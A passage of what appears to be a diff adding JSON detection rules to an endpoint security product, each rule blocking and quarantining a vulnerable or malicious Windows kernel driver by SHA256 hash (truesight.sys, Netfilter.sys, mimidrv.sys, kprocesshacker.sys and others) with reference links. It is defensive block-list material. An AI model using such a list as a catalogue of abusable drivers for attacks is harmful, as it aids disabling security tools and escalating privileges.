+ "references": [], + "type": "hash", + "value": "81fbc9d02ef9e05602ea9c0804d423043d0ea5a06393c7ece3be03459f76a41d", + "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb66461a-5ba5-5954-833a-988883514cb8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983491Z", + "creation_date": "2026-03-23T11:45:29.983493Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983498Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb74d5c1-f83a-5d3d-b7b1-0cf3fb02149d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616398Z", + "creation_date": "2026-03-23T11:45:29.616400Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616406Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "990165725debccea7ca15aa4ed7a0e3a2a25b4a72cb309a27c899bd0e4b5148f", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb8a86ef-bf0c-5305-ac30-57122fa59a8c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828047Z", + "creation_date": "2026-03-23T11:45:30.828049Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828054Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b4059ef4aced7c629f7ae56ac40c6bdcedc43fa9077990ee5994556de40c0f95", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fba0be65-8fd0-53c5-9649-639b2735b92b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812186Z", + "creation_date": "2026-03-23T11:45:31.812188Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812194Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85e24c00c5c5de599141a735c97d584da8bb39bbcd8f78447f7522866e90ac6a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fbaa4cc5-4f4f-5c15-80ae-bd7014370e92", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984675Z", + "creation_date": 
"2026-03-23T11:45:29.984677Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984683Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6071db01b50c658cf78665c24f1d21f21b4a12d16bfcfaa6813bf6bbc4d0a1e8", + "comment": "Vulnerable Kernel Driver (aka VBoxUSB.Sys) [https://www.loldrivers.io/drivers/5938df1d-9513-449f-8252-c442ddca0c2a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fbb51792-c97c-58e3-b0dd-053d169ddc97", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831567Z", + "creation_date": "2026-03-23T11:45:30.831569Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831574Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ba8cc319eac7d94be45bb67e8fe746da519fc457b0479621464b861eed80b360", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fbba39da-5cc1-510e-ad39-9be9f7e1f57d", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828895Z", + "creation_date": "2026-03-23T11:45:30.828897Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828902Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b72ea6d11a53e4f4e094aa635b9c039f47093b0f722e88d2681d1270e8ef4698", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fbbe80ce-6f61-57c6-9ffe-e5122d6ccb44", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978510Z", + "creation_date": "2026-03-23T11:45:29.978512Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.978517Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "68dca726b16c56c70259c8f936ec20adb9ecb8c3cc73985083f41358c83935f4", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fbe8c7be-3e4c-53b1-b933-0a3fb3e39cd1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156706Z", + "creation_date": "2026-03-23T11:45:31.156708Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156714Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a3ce27a2f733926e2666c7911efd01c2ab2e5d788aab5fe4e347c99ea2cb241", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fbf23471-f2ca-5fe7-a959-896d29c96c78", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614562Z", + "creation_date": "2026-03-23T11:45:29.614564Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614570Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "50d5eaa168c077ce5b7f15b3f2c43bd2b86b07b1e926c1b332f8cb13bd2e0793", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fbfa9ab3-f36d-58f7-86b3-e5aa9695f89c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141095Z", + "creation_date": "2026-03-23T11:45:31.141098Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141106Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"ea21b449d1dea61c47d55ecc9981ab7c2959d6652907a303163600f67f58542a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc1e8d2b-e1f0-5273-9b1d-bc9a0379c31a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145755Z", + "creation_date": "2026-03-23T11:45:32.145757Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145762Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f43b0b9a1d1445ba66e8370397cb22142439fa4062b7b05e30f9b26a370d767c", + "comment": "Malicious Kernel Driver (aka driver_668c5bea.sys) [https://www.loldrivers.io/drivers/04eefdf4-448d-45bb-87fc-93f263fc77f4/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc30359b-bdac-53a9-a72d-0812411f6ab8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466972Z", + "creation_date": "2026-03-23T11:45:30.466975Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466985Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7b49579b74108e2418a6b401cd729e3fafe1c8ba1fe8434f73c8d0f1758b08d3", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc3362e1-7c3c-5445-9d07-d05024d5b7c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155136Z", + "creation_date": "2026-03-23T11:45:31.155138Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155144Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e0245a1671aaef05e6622fc3714cd12c2a462d671e7d5fc27dff521f7b990af", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc38f201-6e9c-54ee-a11e-368d06f001e0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471318Z", + "creation_date": "2026-03-23T11:45:30.471322Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471330Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bdcacb9f373b017d0905845292bca2089feb0900ce80e78df1bcaae8328ce042", + "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/fbdd993b-47b1-4448-8c41-24c310802398/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc3cf96f-1b6b-5228-8543-5ab39a7d8a72", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815490Z", + "creation_date": "2026-03-23T11:45:31.815492Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815498Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d2b85836b0888b91b3ad457d025d411bcc580c3bb74eadb8f3a5db87da94ebf0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc3efe2e-cc59-5263-abad-c17d7af26d3c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605285Z", + "creation_date": "2026-03-23T11:45:29.605287Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605293Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c97b5c4ed563047d79e7e015a691d00f06c3737ef156d1e5b4bdfe325b6f7d9", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc4a48b7-8ea0-5d9e-b5d9-17410fb4d17b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824915Z", + "creation_date": "2026-03-23T11:45:30.824919Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824928Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "20e178dce3eff6e8a1c1cb1f70d669c3e5a5ef3fa5e961b14975fb69eec1f2d5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc4db004-c402-50d7-b753-80fec151d311", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604243Z", + "creation_date": "2026-03-23T11:45:29.604245Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604250Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "93f787e33a663311a6a553db1c7d7e5b3f4cd20b0b7725b35dbd0dd67308cef4", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc5355c6-2e4f-59e4-a411-cc807cdf9a10", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604969Z", + "creation_date": "2026-03-23T11:45:29.604970Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604976Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2269f6117274297a63e149c6dac51bc3780fd1f64b111f5fa535e1d5718ebccf", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc5d492f-7c7f-54e5-bce4-ec16139e95c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489928Z", + "creation_date": "2026-03-23T11:45:31.489931Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489940Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "193d2589c7c929ad3dccc5c8cace740f018615c6d2f3f210e362de1abb06e5c6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc5f422e-4d08-5fe3-bc3f-5fa9a2b9614a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144176Z", + "creation_date": "2026-03-23T11:45:31.144177Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144183Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a5605d952927cc8cbfa504498e70585410bd3224c04fd5f57ab6586a4afb11f5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc662720-fa09-5f24-be58-45978b2757c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609702Z", + "creation_date": "2026-03-23T11:45:29.609704Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609709Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5351c81b4ec5a0d79c39d24bac7600d10eac30c13546fde43d23636b3f421e7c", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc6adc50-9e4c-55c8-a42b-52186b5d3413", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454388Z", + "creation_date": 
"2026-03-23T11:45:30.454391Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454400Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d9500af86bf129d06b47bcfbc4b23fcc724cfbd2af58b03cdb13b26f8f50d65e", + "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fc6deb0e-4bc2-5165-9aae-6ae95c2b184d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 